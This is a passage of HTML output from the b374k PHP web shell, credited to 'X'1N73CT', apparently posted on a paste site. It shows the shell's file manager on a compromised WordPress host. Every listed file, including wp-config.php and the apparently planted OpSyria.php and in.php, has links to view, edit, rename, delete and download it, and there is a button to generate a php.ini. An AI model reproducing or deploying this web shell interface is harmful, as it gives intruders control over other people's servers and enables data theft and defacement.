  444. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/OpSyria.php">edit</a> | <a href="javascript:tukar('OpSyria.php_link','OpSyria.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/OpSyria.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/OpSyria.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/OpSyria.php">gzip</a>)</td></tr><tr><td><a id="__index.html_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/__index.html">__index.html</a>
  445. <form action="?y=/home/servinfo/public_html/" method="post" id="__index.html_form" class="sembunyi" style="margin:0;padding:0;">
  446.  
  447. <input type="hidden" name="oldname" value="__index.html" style="margin:0;padding:0;" />
  448. <input class="inputz" style="width:200px;" type="text" name="newname" value="__index.html" />
  449. <input class="inputzbut" type="submit" name="rename" value="rename" />
  450. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('__index.html_link','__index.html_form');" />
  451. </form>
  452. </td><td>129</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">26-May-2013 01:48</td>
  453.  
  454. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/__index.html">edit</a> | <a href="javascript:tukar('__index.html_link','__index.html_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/__index.html">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/__index.html">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/__index.html">gzip</a>)</td></tr><tr><td><a id="error_log_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/error_log">error_log</a>
  455. <form action="?y=/home/servinfo/public_html/" method="post" id="error_log_form" class="sembunyi" style="margin:0;padding:0;">
  456.  
  457. <input type="hidden" name="oldname" value="error_log" style="margin:0;padding:0;" />
  458. <input class="inputz" style="width:200px;" type="text" name="newname" value="error_log" />
  459. <input class="inputzbut" type="submit" name="rename" value="rename" />
  460. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('error_log_link','error_log_form');" />
  461. </form>
  462. </td><td>75.61 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">27-Sep-2013 05:25</td>
  463.  
  464. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/error_log">edit</a> | <a href="javascript:tukar('error_log_link','error_log_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/error_log">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/error_log">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/error_log">gzip</a>)</td></tr><tr><td><a id="in.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/in.php">in.php</a>
  465. <form action="?y=/home/servinfo/public_html/" method="post" id="in.php_form" class="sembunyi" style="margin:0;padding:0;">
  466.  
  467. <input type="hidden" name="oldname" value="in.php" style="margin:0;padding:0;" />
  468. <input class="inputz" style="width:200px;" type="text" name="newname" value="in.php" />
  469. <input class="inputzbut" type="submit" name="rename" value="rename" />
  470. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('in.php_link','in.php_form');" />
  471. </form>
  472. </td><td>99.34 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">27-Sep-2013 05:22</td>
  473.  
  474. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/in.php">edit</a> | <a href="javascript:tukar('in.php_link','in.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/in.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/in.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/in.php">gzip</a>)</td></tr><tr><td><a id="index.html_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/index.html">index.html</a>
  475. <form action="?y=/home/servinfo/public_html/" method="post" id="index.html_form" class="sembunyi" style="margin:0;padding:0;">
  476.  
  477. <input type="hidden" name="oldname" value="index.html" style="margin:0;padding:0;" />
  478. <input class="inputz" style="width:200px;" type="text" name="newname" value="index.html" />
  479. <input class="inputzbut" type="submit" name="rename" value="rename" />
  480. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('index.html_link','index.html_form');" />
  481. </form>
  482. </td><td>89</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">01-Oct-2013 03:46</td>
  483.  
  484. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/index.html">edit</a> | <a href="javascript:tukar('index.html_link','index.html_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/index.html">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/index.html">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/index.html">gzip</a>)</td></tr><tr><td><a id="jac.html_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/jac.html">jac.html</a>
  485. <form action="?y=/home/servinfo/public_html/" method="post" id="jac.html_form" class="sembunyi" style="margin:0;padding:0;">
  486.  
  487. <input type="hidden" name="oldname" value="jac.html" style="margin:0;padding:0;" />
  488. <input class="inputz" style="width:200px;" type="text" name="newname" value="jac.html" />
  489. <input class="inputzbut" type="submit" name="rename" value="rename" />
  490. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('jac.html_link','jac.html_form');" />
  491. </form>
  492. </td><td>3.01 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">01-Sep-2013 04:53</td>
  493.  
  494. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/jac.html">edit</a> | <a href="javascript:tukar('jac.html_link','jac.html_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/jac.html">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/jac.html">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/jac.html">gzip</a>)</td></tr><tr><td><a id="license.txt_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/license.txt">license.txt</a>
  495. <form action="?y=/home/servinfo/public_html/" method="post" id="license.txt_form" class="sembunyi" style="margin:0;padding:0;">
  496.  
  497. <input type="hidden" name="oldname" value="license.txt" style="margin:0;padding:0;" />
  498. <input class="inputz" style="width:200px;" type="text" name="newname" value="license.txt" />
  499. <input class="inputzbut" type="submit" name="rename" value="rename" />
  500. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('license.txt_link','license.txt_form');" />
  501. </form>
  502. </td><td>19.46 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  503.  
  504. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/license.txt">edit</a> | <a href="javascript:tukar('license.txt_link','license.txt_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/license.txt">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/license.txt">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/license.txt">gzip</a>)</td></tr><tr><td><a id="php.ini_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/php.ini">php.ini</a>
  505. <form action="?y=/home/servinfo/public_html/" method="post" id="php.ini_form" class="sembunyi" style="margin:0;padding:0;">
  506.  
  507. <input type="hidden" name="oldname" value="php.ini" style="margin:0;padding:0;" />
  508. <input class="inputz" style="width:200px;" type="text" name="newname" value="php.ini" />
  509. <input class="inputzbut" type="submit" name="rename" value="rename" />
  510. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('php.ini_link','php.ini_form');" />
  511. </form>
  512. </td><td>24</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">01-Oct-2013 00:38</td>
  513.  
  514. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/php.ini">edit</a> | <a href="javascript:tukar('php.ini_link','php.ini_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/php.ini">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/php.ini">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/php.ini">gzip</a>)</td></tr><tr><td><a id="swt.html_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/swt.html">swt.html</a>
  515. <form action="?y=/home/servinfo/public_html/" method="post" id="swt.html_form" class="sembunyi" style="margin:0;padding:0;">
  516.  
  517. <input type="hidden" name="oldname" value="swt.html" style="margin:0;padding:0;" />
  518. <input class="inputz" style="width:200px;" type="text" name="newname" value="swt.html" />
  519. <input class="inputzbut" type="submit" name="rename" value="rename" />
  520. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('swt.html_link','swt.html_form');" />
  521. </form>
  522. </td><td>137</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">27-Sep-2013 04:06</td>
  523.  
  524. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/swt.html">edit</a> | <a href="javascript:tukar('swt.html_link','swt.html_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/swt.html">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/swt.html">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/swt.html">gzip</a>)</td></tr><tr><td><a id="wp-activate.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-activate.php">wp-activate.php</a>
  525. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-activate.php_form" class="sembunyi" style="margin:0;padding:0;">
  526.  
  527. <input type="hidden" name="oldname" value="wp-activate.php" style="margin:0;padding:0;" />
  528. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-activate.php" />
  529. <input class="inputzbut" type="submit" name="rename" value="rename" />
  530. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-activate.php_link','wp-activate.php_form');" />
  531. </form>
  532. </td><td>4.55 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  533.  
  534. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-activate.php">edit</a> | <a href="javascript:tukar('wp-activate.php_link','wp-activate.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-activate.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-activate.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-activate.php">gzip</a>)</td></tr><tr><td><a id="wp-app.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-app.php">wp-app.php</a>
  535. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-app.php_form" class="sembunyi" style="margin:0;padding:0;">
  536.  
  537. <input type="hidden" name="oldname" value="wp-app.php" style="margin:0;padding:0;" />
  538. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-app.php" />
  539. <input class="inputzbut" type="submit" name="rename" value="rename" />
  540. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-app.php_link','wp-app.php_form');" />
  541. </form>
  542. </td><td>1.32 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">25-Sep-2012 23:08</td>
  543.  
  544. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-app.php">edit</a> | <a href="javascript:tukar('wp-app.php_link','wp-app.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-app.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-app.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-app.php">gzip</a>)</td></tr><tr><td><a id="wp-blog-header.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-blog-header.php">wp-blog-header.php</a>
  545. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-blog-header.php_form" class="sembunyi" style="margin:0;padding:0;">
  546.  
  547. <input type="hidden" name="oldname" value="wp-blog-header.php" style="margin:0;padding:0;" />
  548. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-blog-header.php" />
  549. <input class="inputzbut" type="submit" name="rename" value="rename" />
  550. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-blog-header.php_link','wp-blog-header.php_form');" />
  551. </form>
  552. </td><td>271</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  553.  
  554. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-blog-header.php">edit</a> | <a href="javascript:tukar('wp-blog-header.php_link','wp-blog-header.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-blog-header.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-blog-header.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-blog-header.php">gzip</a>)</td></tr><tr><td><a id="wp-comments-post.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-comments-post.php">wp-comments-post.php</a>
  555. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-comments-post.php_form" class="sembunyi" style="margin:0;padding:0;">
  556.  
  557. <input type="hidden" name="oldname" value="wp-comments-post.php" style="margin:0;padding:0;" />
  558. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-comments-post.php" />
  559. <input class="inputzbut" type="submit" name="rename" value="rename" />
  560. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-comments-post.php_link','wp-comments-post.php_form');" />
  561. </form>
  562. </td><td>3.44 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  563.  
  564. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-comments-post.php">edit</a> | <a href="javascript:tukar('wp-comments-post.php_link','wp-comments-post.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-comments-post.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-comments-post.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-comments-post.php">gzip</a>)</td></tr><tr><td><a id="wp-config-sample.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-config-sample.php">wp-config-sample.php</a>
  565. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-config-sample.php_form" class="sembunyi" style="margin:0;padding:0;">
  566.  
  567. <input type="hidden" name="oldname" value="wp-config-sample.php" style="margin:0;padding:0;" />
  568. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-config-sample.php" />
  569. <input class="inputzbut" type="submit" name="rename" value="rename" />
  570. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-config-sample.php_link','wp-config-sample.php_form');" />
  571. </form>
  572. </td><td>3.1 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  573.  
  574. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-config-sample.php">edit</a> | <a href="javascript:tukar('wp-config-sample.php_link','wp-config-sample.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-config-sample.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-config-sample.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-config-sample.php">gzip</a>)</td></tr><tr><td><a id="wp-config.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-config.php">wp-config.php</a>
  575. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-config.php_form" class="sembunyi" style="margin:0;padding:0;">
  576.  
  577. <input type="hidden" name="oldname" value="wp-config.php" style="margin:0;padding:0;" />
  578. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-config.php" />
  579. <input class="inputzbut" type="submit" name="rename" value="rename" />
  580. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-config.php_link','wp-config.php_form');" />
  581. </form>
  582. </td><td>3.55 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Apr-2013 22:38</td>
  583.  
  584. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-config.php">edit</a> | <a href="javascript:tukar('wp-config.php_link','wp-config.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-config.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-config.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-config.php">gzip</a>)</td></tr><tr><td><a id="wp-links-opml.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-links-opml.php">wp-links-opml.php</a>
  585. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-links-opml.php_form" class="sembunyi" style="margin:0;padding:0;">
  586.  
  587. <input type="hidden" name="oldname" value="wp-links-opml.php" style="margin:0;padding:0;" />
  588. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-links-opml.php" />
  589. <input class="inputzbut" type="submit" name="rename" value="rename" />
  590. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-links-opml.php_link','wp-links-opml.php_form');" />
  591. </form>
  592. </td><td>1.95 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  593.  
  594. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-links-opml.php">edit</a> | <a href="javascript:tukar('wp-links-opml.php_link','wp-links-opml.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-links-opml.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-links-opml.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-links-opml.php">gzip</a>)</td></tr><tr><td><a id="wp-load.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-load.php">wp-load.php</a>
  595. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-load.php_form" class="sembunyi" style="margin:0;padding:0;">
  596.  
  597. <input type="hidden" name="oldname" value="wp-load.php" style="margin:0;padding:0;" />
  598. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-load.php" />
  599. <input class="inputzbut" type="submit" name="rename" value="rename" />
  600. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-load.php_link','wp-load.php_form');" />
  601. </form>
  602. </td><td>2.35 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  603.  
  604. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-load.php">edit</a> | <a href="javascript:tukar('wp-load.php_link','wp-load.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-load.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-load.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-load.php">gzip</a>)</td></tr><tr><td><a id="wp-settings.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-settings.php">wp-settings.php</a>
  605. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-settings.php_form" class="sembunyi" style="margin:0;padding:0;">
  606.  
  607. <input type="hidden" name="oldname" value="wp-settings.php" style="margin:0;padding:0;" />
  608. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-settings.php" />
  609. <input class="inputzbut" type="submit" name="rename" value="rename" />
  610. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-settings.php_link','wp-settings.php_form');" />
  611. </form>
  612. </td><td>9.67 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:39</td>
  613.  
  614. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-settings.php">edit</a> | <a href="javascript:tukar('wp-settings.php_link','wp-settings.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-settings.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-settings.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-settings.php">gzip</a>)</td></tr><tr><td><a id="wp-signup.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-signup.php">wp-signup.php</a>
  615. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-signup.php_form" class="sembunyi" style="margin:0;padding:0;">
  616.  
  617. <input type="hidden" name="oldname" value="wp-signup.php" style="margin:0;padding:0;" />
  618. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-signup.php" />
  619. <input class="inputzbut" type="submit" name="rename" value="rename" />
  620. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-signup.php_link','wp-signup.php_form');" />
  621. </form>
  622. </td><td>17.79 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  623.  
  624. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-signup.php">edit</a> | <a href="javascript:tukar('wp-signup.php_link','wp-signup.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-signup.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-signup.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-signup.php">gzip</a>)</td></tr><tr><td><a id="wp-trackback.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/wp-trackback.php">wp-trackback.php</a>
  625. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-trackback.php_form" class="sembunyi" style="margin:0;padding:0;">
  626.  
  627. <input type="hidden" name="oldname" value="wp-trackback.php" style="margin:0;padding:0;" />
  628. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-trackback.php" />
  629. <input class="inputzbut" type="submit" name="rename" value="rename" />
  630. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-trackback.php_link','wp-trackback.php_form');" />
  631. </form>
  632. </td><td>3.61 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  633.  
  634. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/wp-trackback.php">edit</a> | <a href="javascript:tukar('wp-trackback.php_link','wp-trackback.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/wp-trackback.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/wp-trackback.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/wp-trackback.php">gzip</a>)</td></tr><tr><td><a id="xmlrpc.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/xmlrpc.php">xmlrpc.php</a>
  635. <form action="?y=/home/servinfo/public_html/" method="post" id="xmlrpc.php_form" class="sembunyi" style="margin:0;padding:0;">
  636.  
  637. <input type="hidden" name="oldname" value="xmlrpc.php" style="margin:0;padding:0;" />
  638. <input class="inputz" style="width:200px;" type="text" name="newname" value="xmlrpc.php" />
  639. <input class="inputzbut" type="submit" name="rename" value="rename" />
  640. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('xmlrpc.php_link','xmlrpc.php_form');" />
  641. </form>
  642. </td><td>2.66 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">28-Apr-2013 22:07</td>
  643.  
  644. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/xmlrpc.php">edit</a> | <a href="javascript:tukar('xmlrpc.php_link','xmlrpc.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/xmlrpc.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/xmlrpc.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/xmlrpc.php">gzip</a>)</td></tr></table><br><input class=inputzbut align=left type=submit name=ini value="use to Generate PHP.ini" />
  645. <center><br><br><div class="info">-=[ b374k r3c0ded by <span class="gaya"><b><a href="http://facebook.com/xinject.aja">X'1N73CT</a></b></span> ]=-</div>
  646.  
  647. <div class="jaya"> &copy; 2013 X'1N73CT</div></center><br><br>
  648. </script>
  649. </div>
  650. </body>
  651. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement